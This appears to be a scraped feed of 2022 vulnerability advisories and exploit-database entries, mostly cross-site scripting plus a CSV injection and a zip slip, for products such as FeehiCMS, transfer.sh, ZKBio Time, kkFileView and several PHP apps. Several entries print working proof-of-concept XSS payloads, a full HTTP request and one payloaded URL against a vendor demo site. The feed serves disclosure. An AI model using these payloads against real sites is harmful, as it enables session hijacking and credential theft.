FeehiCMS versions 2.0.1.1 and prior contain a cross-site scripting (XSS) vulnerability via a crafted payload injected into the Comment box under the Single Page module. There are no patches and no known workarounds for this issue.

**FeehiCMS vulnerable to Cross-Site scripting via crafted payload**

Moderate severity GitHub Reviewed Published Sep 30, 2022 • Updated Oct 1, 2022

GHSA-5mqq-7g25-r4wx: FeehiCMS vulnerable to Cross-Site scripting via crafted payload

dutchcoders Transfer.sh versions 1.4.0 and prior are vulnerable to Cross Site Scripting (XSS) via a malicious document uploaded in transfer.sh.  There is a fix commit merged into [main](https://github.com/dutchcoders/transfer.sh/commit/31ad4e01e158497519f8680c187e1ceb8594c59d) for this issue, but an updated version has not yet been released.

**Dutchoders transfer.sh contains an XSS vulnerability via malicious file upload**

Moderate severity GitHub Reviewed Published Sep 30, 2022 • Updated Oct 1, 2022

GHSA-pwq7-f7f9-cm2j: Dutchoders transfer.sh contains an XSS vulnerability via malicious file upload

ZKTeco Xiamen Information Technology ZKBio Time 8.0.7 Build: 20220721.14829 was discovered to contain a CSV injection vulnerability. This vulnerability allows attackers to execute arbitrary code via a crafted payload injected into the Content text field of the Add New Message module.

**ZKBio Time - CSV Injection**

 Hi all,

I am here with new post. Recently I have identified a csv injection vulnerability in one of the web-based time and attendance management software. Below are the details:

**Software Description:**

ZKBio Time is a powerful web-based time and attendance management software. With a powerful data handling capacity, the system can manage the attendance data of 10,000 employees. It can easily handle hundreds of devices and thousands of employees and their transactions. ZKBio Time comes with an intuitive user interface is able to manage timetable, shift and schedule and can easily generate attendance reports.

**Impacted Version: 8.0.7 (Build: 20220721.14829) and before.**

**Vulnerability details:**

1.  Login to ZKBio Time Application
2.  In the left Menu click on Messages -> Public
3.  Click on ADD new message button
4.  Write your Device Serial Number
5.  Mention any date/time and duration
6.  In Content Field Add your CSV injection payload.
7.  As shown below
    
      
    
8.  Any user who extract the report in CSV format and opens it
9.    
    
10.  The embedded payload will be executed

There is 90% chance that user will ignore the below warning box as the report is downloaded from trusted source. This will lead to payload execution.

**Thanks**

**Popular posts from this blog**

**Add Background Image on your USB/Flash Drive/Any System drive.**

How to set a Background Image on your Pendrive: 1.Select an image on your computer which you want to appear as background image. 2.Rename that image to "Image" without quotes. 3.Now copy and paste the image to your Pendrive. 4.Now create a new notepad file in ur Pendrive and paste the following code in it. \[ExtShellFolder Views\] {BE098140-A513-11D0-A3A4-00C04FD706EC}= {BE098140-A513-11D0-A3A4-00C04FD706EC} \[{BE098140-A513-11D0-A3A4-00C04FD706EC}\] IconArea\_Image= Image.jpg (check the file type of image. if its .jpg or .png or .bmp etc) 5.Save the file as desktop.ini in your pendrive and change the save as type to all files. 6.Remove your Pendrive and Enter Again and Open it. Note: This trick works best on Windows Xp and Vista . Wallpaper could also be set in any other directory like C:, D:, E: etc. Just copy and paste the files in the directory where you want the wallpaper to appear.

**Ericsson BSCS iX R18 Billing & Rating (ADMX, MX) - Stored XSS**

Dear Reader, I was able to identify stored XSS in multiple web base modules of Ericsson BSCS iX R18 Billing & Rating platform  Below are its details: # Software description: Ericsson Billing is a convergent billing solution for telecoms that combines an unrivaled combination of out-of-the box features and high configurability. As an evolution of the widely-installed Ericsson BSCS iX, Ericsson Billing provides a low-risk but effective route to capture and secure revenue streams and take advantage of business opportunities from both traditional telecom services as well as digital services, 5G and IoT. # Technical Details & Impact: There are multiple web base modules in BSCS iX e.g. ADMX, MX (monitoring center), CX etc. It was observed that ADMX and MX are vulnerable to stored XSS, In most test cases session hijacking was also possible by utilizing the XSS vulnerability. This potentially allows for full account takeover, or exploiting admin's browsers using beef

**Autoconfiguration ipv4 address 196.254.x.x IP Problem**

Today when i connect my laptop to Lan it wasn't getting the ip from my DHCP server. Instead it gives me some weird IP like 196.254.x.x . while my Wifi was working fine, I searched Alot to get to know until i found a great piece of code on a blog. so going to share with you guys. Problem with my Ip. Steps to follow: If you are Using any Firewall disable it (like i use comodo so i disable it temporary) Click on start and click on RUN (or simple press windowsKey+R ) type CMD   Now type the below Codes  netsh interface ipv4 show inter It will show like this.  As we have problem in LAN so my LAN here is Local Area Connection  and Its Idx=11 (we will use this idx number in next code) Now type in this code and replace your Idx number, as mine is 11    netsh interface ipv4 set interface 11 dadtransmits=0 store=persistent   It will show like this.  If it says OK. Congratulations you have done the difficult part Now Click on Start and Run again and Type Servic

CVE-2022-40472: ZKBio Time - CSV Injection

DGIOT Lightweight industrial IoT v4.5.4 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities.

**CVE-ID: CVE-2022-35137**

DGIOT Lightweight industrial IoT v4.5.4 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities. The platform does not output encode JS payloads such as <script>alert(document.cookie)</script>. These are instances of stored XSS that can be abused to steal admin user cookies.

**References:**

https://owasp.org/www-community/attacks/xss/

CVE-2022-35137: CVE-ID: CVE-2022-35137

kkFileView v4.1.0 is vulnerable to Cross Site Scripting (XSS) via the parameter 'errorMsg.'

kkFileview v4.1.0 has another XSS vulnerability, which may lead to the leakage of website cookies.

**漏洞位置vulerable code location**  
kkFileView/server/src/main/java/cn/keking/web/controller/OnlinePreviewController.java文件61行，errorMsg参数用户可控，传输到错误提示处理函数中处理后用于前端错误提示，整个流程未对errorMsg参数进行过滤处理

The vulnerability code is located at line 61 in kkFileView/server/src/main/java/cn/keking/web/controller/OnlinePreviewController.java , The errorMsg parameter is user-controllable. After being transferred to the error prompt processing function for processing, it is used for the front-end error prompt, and the errorMsg parameter is not filtered throughout the process

        public String onlinePreview(String url, Model model, HttpServletRequest req) {
            String fileUrl;
            try {
                fileUrl = WebUtils.decodeBase64String(url);
            } catch (Exception ex) {
                String errorMsg = String.format(BASE64_DECODE_ERROR_MSG, "url");
                return otherFilePreview.notSupportedFile(model, errorMsg);
            }
            FileAttribute fileAttribute = fileHandlerService.getFileAttribute(fileUrl, req);
            model.addAttribute("file", fileAttribute);
            FilePreview filePreview = previewFactory.get(fileAttribute);
            logger.info("预览文件url：{}，previewType：{}", fileUrl, fileAttribute.getType());
            return filePreview.filePreviewHandle(fileUrl, model, fileAttribute);
        }

CVE-2022-40879: Another kkFileView XSS Vulnerability · Issue #389 · kekingcn/kkFileView

dutchcoders Transfer.sh 1.4.0 is vulnerable to Cross Site Scripting (XSS).

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-40931: Fixed improper implementation of content type by blind-intruder · Pull Request #501 · dutchcoders/transfer.sh

Bus Pass Management System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Bus Pass Management System 1.0 - 'searchdata' Cross-Site Scripting (XSS)# Date: 2022-07-02# Exploit Author: Ali Alipour# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip# Version: 1.0# Tested on: Windows 10 Pro x64 - XAMPP Server# CVE : N/A#Issue Detail:The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response.This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.# Vulnerable page: /buspassms/download-pass.php# Vulnerable Parameter: searchdata [ POST Data ]#Request : POST /buspassms/download-pass.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3Origin: https://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: https://127.0.0.1/buspassms/download-pass.phpContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateAccept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 25searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search=#Response : HTTP/1.1 200 OKDate: Fri, 01 Jul 2022 00:14:25 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8X-Powered-By: PHP/7.4.8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 6425Connection: closeContent-Type: text/html; charset=UTF-8<!DOCTYPE html><html lang="en"><head><title>Bus Pass Management System || Pass Page</title><script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba...[SNIP]...<h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4>...[SNIP]...

Bus Pass Management System 1.0 Cross Site Scripting

Joomla EDocman extension version 1.23.3 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Ossolution Team                                                            ││  Software : EDocman 1.23.3 Extension for Joomla - Reflected XSS                        ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'filter_search' is vulnerable to XSSPath: index.php/edocman-layouts/categories-layouts/tree-view/search-result?filter_category_id=1&filter_search=[XSS]https://joomdonationdemo.com/edocman/index.php/edocman-layouts/categories-layouts/tree-view/search-result?filter_category_id=1&filter_search=ekmj6"onfocus="alert(1)"autofocus="fjozn[-] Done

Joomla EDocman 1.23.3 Cross Site Scripting

Online Examination System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Online Examination System - Cross site scripting Reflected# Google Dork: N/A# Date: 2022-9-29# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :vulnerable code in file index.php157 <?php if(@$_GET['q7'])158 { echo'<p style="color:red;font-size:15px;">'.@$_GET['q7'];}?>http://localhost/examination/index.php?q7=%22%3E%3Cscript%3Ealert(%22yousef%22);%3C/script%3Einject payload parameter q7

Online Examination System 1.0 Cross Site Scripting

A zip slip vulnerability in the file upload function of Chamilo v1.11 allows attackers to execute arbitrary code via a crafted Zip file.

Tag

#xss